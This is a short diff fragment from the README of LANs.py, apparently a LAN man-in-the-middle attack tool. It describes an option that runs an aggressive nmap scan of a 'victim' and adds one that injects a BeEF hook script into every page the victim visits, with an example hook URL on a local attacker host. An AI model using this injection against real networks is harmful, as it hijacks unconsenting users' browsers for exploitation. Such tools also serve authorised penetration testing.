DanMcInerney/LANs.py/README.md

 -na, performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt

+-b BEEF_HOOK_URL, copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js

 Cleans the following on Ctrl-C: